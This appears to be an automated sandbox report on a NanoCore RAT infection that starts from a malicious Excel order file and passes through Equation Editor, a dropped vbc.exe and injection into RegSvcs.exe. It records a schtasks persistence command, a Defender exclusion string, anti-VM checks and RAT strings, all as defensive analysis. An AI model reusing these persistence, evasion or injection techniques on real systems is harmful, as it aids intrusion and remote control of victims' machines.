Source: 4.2.vbc.exe.d00000.1.unpack, CuDKkqb9fujhnZr9Ai/PP4n1TJr1Xh9QQ9GpY.csHigh entropy of concatenated method names: 'g1Xeh9QQ9', 'cpYtvuDKk', 'g9AiiDfDN', 'nkXlP1Ci2', '.ctor', 'qO8ONZvrh', 'ei9XAFeXE', 'eLpBlTLqr', 'AFZGYZCJd5', 'FaNAP4n1T'
Source: 4.2.vbc.exe.d00000.1.unpack, PEJBXMArGEXXMibeB4/VHtvIHBBI0AWiAfhcJ.csHigh entropy of concatenated method names: 'jpjkwsAGDN', 'GMtk0q7LvC', 'OxhkYJucG6', 'bWpkork4Lf', '.ctor', 'l3IGQ1d0RG', 'ToString', 'pluk6S3m4W', 'hJPHskHI11plv4xyaJp', 'lvi45nHGRQeB9GSMfoH'
Source: 4.2.vbc.exe.d00000.1.unpack, sRpRS2Frx4HmHLiTiQ/Asnnnw2mk16ElvoTom.csHigh entropy of concatenated method names: 'AFZkZCJd5', 'QuYnbtNkBAIknWgOB4', 'Xe921B6KBuqrDhUc2i', 'AerSd7r5Mj1frUSoQ3', 'EUwFwIa9RhhA0y84vV', 'qnbJsWcestqFm4lt9c', 'uCSrdb7B9GDDPpnkO5'
Source: 4.2.vbc.exe.d00000.1.unpack, zsKCbvMEqdplulquC5/l83ecsIQRYPU9U2WDW.csHigh entropy of concatenated method names: 'I5K8uZpD7H', 'mF583XMeqW', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'roYdQD2h0yQjGEh2C9Q', 'RLjTxv28FEAwN9Gf6Kc', 'usXvsr2mPlZhnIfkwA9'
Source: 4.2.vbc.exe.d00000.1.unpack, wy1AdR1np9WlJVqIhu/Cie2rZaBGedqv9947T.csHigh entropy of concatenated method names: 'SlkGgsDX3i', 'bHpGLEUxQy', 'qnKGHPdynA', 'vmdGOEeoJ3', '.ctor', 'hwmGEk16El', 'KQXfyj2zJQ8MrBNeABL', 'pivo7TxOtTwwmcNRlOI', 'tY9QjbxHxcRGrnLGAu4', 'qfGsQdx20MZXaBbxQtj'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\CXFxEHIAOoJFws.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CXFxEHIAOoJFws' /XML 'C:\Users\user\AppData\Local\Temp\tmp98E5.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3Show sources
Source: Yara matchFile source: 4.2.vbc.exe.24e79e4.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2696, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: vbc.exe, 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1164Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2248Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00530BB6 GetSystemInfo,
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
Source: vbc.exe, 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmpBinary or memory string: vmware
Source: Sts Global Order.xlsxBinary or memory string: HgFs:
Source: vbc.exe, 00000004.00000002.477910962.00000000006D9000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.479837690.00000000024E1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regionsShow sources
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008
Allocates memory in foreign processesShow sources
Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processesShow sources
Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CXFxEHIAOoJFws' /XML 'C:\Users\user\AppData\Local\Temp\tmp98E5.tmp'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: RegSvcs.exe, 00000007.00000002.676175546.000000000296A000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmpBinary or memory string: Program Manager(
Source: RegSvcs.exe, 00000007.00000002.676175546.000000000296A000.00000004.00000001.sdmpBinary or memory string: Program Manager
Source: RegSvcs.exe, 00000007.00000002.675822640.00000000012D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000007.00000002.675080136.0000000000605000.00000004.00000020.sdmpBinary or memory string: Program Manager- Sts Global Order
Source: RegSvcs.exe, 00000007.00000002.675080136.0000000000605000.00000004.00000020.sdmpBinary or memory string: ,bProgram Manager4
Source: RegSvcs.exe, 00000007.00000002.675080136.0000000000605000.00000004.00000020.sdmpBinary or memory string: `Program ManagerX
Source: RegSvcs.exe, 00000007.00000002.675822640.00000000012D0000.00000002.00020000.sdmpBinary or memory string: !Progman
Source: RegSvcs.exe, 00000007.00000002.675822640.00000000012D0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
Source: RegSvcs.exe, 00000007.00000002.676175546.000000000296A000.00000004.00000001.sdmpBinary or memory string: Program Manager<
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c7661.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.676414114.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTR

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: RegSvcs.exe, 00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModu